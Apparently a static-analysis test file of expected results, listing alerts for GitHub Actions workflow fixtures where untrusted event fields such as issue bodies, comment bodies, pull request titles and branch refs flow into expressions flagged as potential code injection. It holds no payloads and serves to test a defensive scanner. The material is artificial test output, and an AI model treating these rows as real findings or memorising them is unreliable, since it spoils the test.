| .github/workflows/issues.yaml:18:19:18:37 | env.step_env | ${{ env.step_env }} | .github/workflows/issues.yaml:1:5:1:10 | issues | issues | +| .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/json_wrap.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | ${{ toJSON(github.event.issue.title)}} | .github/workflows/json_wrap.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/level0.yml:3:3:3:8 | issues | issues | +| .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/level0.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/level0.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/level1.yml:3:3:3:14 | workflow_run | workflow_run | +| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | +| .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | +| .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | +| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | +| .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | +| .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | +| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | +| .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | ${{ github.event.review.body }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | +| .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | +| .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | +| .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | +| .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | +| .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | +| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | +| .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | +| .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | +| .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | ${{ github.head_ref }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-2.yml:10:15:10:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | .github/workflows/reusable-workflow-caller-2.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | ${{ env.log }} | .github/workflows/reusable-workflow-caller-2.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | .github/workflows/reusable-workflow-2.yml:45:24:45:61 | github.event.changes.title.from | .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | ${{ env.prev_log }} | .github/workflows/reusable-workflow-caller-2.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | ${{ steps.source.outputs.value }} | .github/workflows/self_needs.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | ${{ needs.test1.outputs.job_output }} | .github/workflows/self_needs.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | .github/workflows/simple2.yml:3:6:3:24 | pull_request_target | pull_request_target | +| .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/simple3.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | ${{ toJSON(github.event) }} | .github/workflows/simple3.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | .github/workflows/slash_command2.yml:11:9:20:6 | Uses Step: command | .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | ${{ steps.command.outputs.command-arguments }} | .github/workflows/slash_command2.yml:2:5:2:17 | issue_comment | issue_comment | +| .github/workflows/test1.yml:27:20:27:39 | env.ISSUE_KEY | .github/workflows/test1.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test1.yml:27:20:27:39 | env.ISSUE_KEY | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test1.yml:27:20:27:39 | env.ISSUE_KEY | ${{ env.ISSUE_KEY }} | .github/workflows/test1.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | .github/workflows/test2.yml:17:9:25:6 | Uses Step: changed | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | ${{ steps.changed.outputs.locale_files }} | .github/workflows/test2.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | .github/workflows/test2.yml:29:9:37:6 | Uses Step: changed2 | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | ${{ steps.changed2.outputs.locale_files }} | .github/workflows/test2.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | .github/workflows/test3.yml:13:9:21:2 | Uses Step: issue_body_parser_request | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | ${{ needs.parse-issue.outputs.payload }} | .github/workflows/test3.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | ${{ toJSON(github.event.comment) }} | .github/workflows/test4.yml:3:3:3:15 | issue_comment | issue_comment | +| .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | ${{ toJSON(github.event.issue) }} | .github/workflows/test4.yml:3:3:3:15 | issue_comment | issue_comment | +| .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | ${{ toJSON(github.event) }} | .github/workflows/test4.yml:3:3:3:15 | issue_comment | issue_comment | +| .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | ${{ toJSON(github.event.comment.body).foo }} | .github/workflows/test5.yml:3:3:3:15 | issue_comment | issue_comment | +| .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | .github/workflows/test7.yml:9:9:13:6 | Uses Step: comment-branch | .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | ${{ steps.comment-branch.outputs.head_ref }} | .github/workflows/test7.yml:2:5:2:17 | issue_comment | issue_comment | +| .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | .github/workflows/test7.yml:13:9:17:6 | Uses Step: refs | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | ${{ steps.refs.outputs.head_ref }} | .github/workflows/test7.yml:2:5:2:17 | issue_comment | issue_comment | +| .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/test8.yml:3:3:3:21 | pull_request_target | pull_request_target | +| .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/test8.yml:3:3:3:21 | pull_request_target | pull_request_target | +| .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | ${{ steps.issue_body_parser_request.outputs.payload }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | ${{ needs.parse-issue.outputs.payload }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | ${{ fromJson(needs.parse-issue.outputs.payload) }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | ${{ fromJson(needs.parse-issue.outputs.payload).version }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | ${{ fromJson(needs.parse-issue.outputs.payload).version }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | ${{ github.event.issue.title }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | .github/workflows/test11.yml:22:9:30:6 | Uses Step | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | ${{ needs.get-artifacts.outputs.pr_num }} | .github/workflows/test11.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | .github/workflows/test11.yml:22:9:30:6 | Uses Step | .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | ${{ needs.get-artifacts.outputs.ref }} | .github/workflows/test11.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | ${{ github.event.pull_request.title \|\| "foo" }} | .github/workflows/test12.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | ${{ github.event.changes.body.from }} | .github/workflows/test13.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | ${{ github.event.changes.title.from }} | .github/workflows/test13.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from 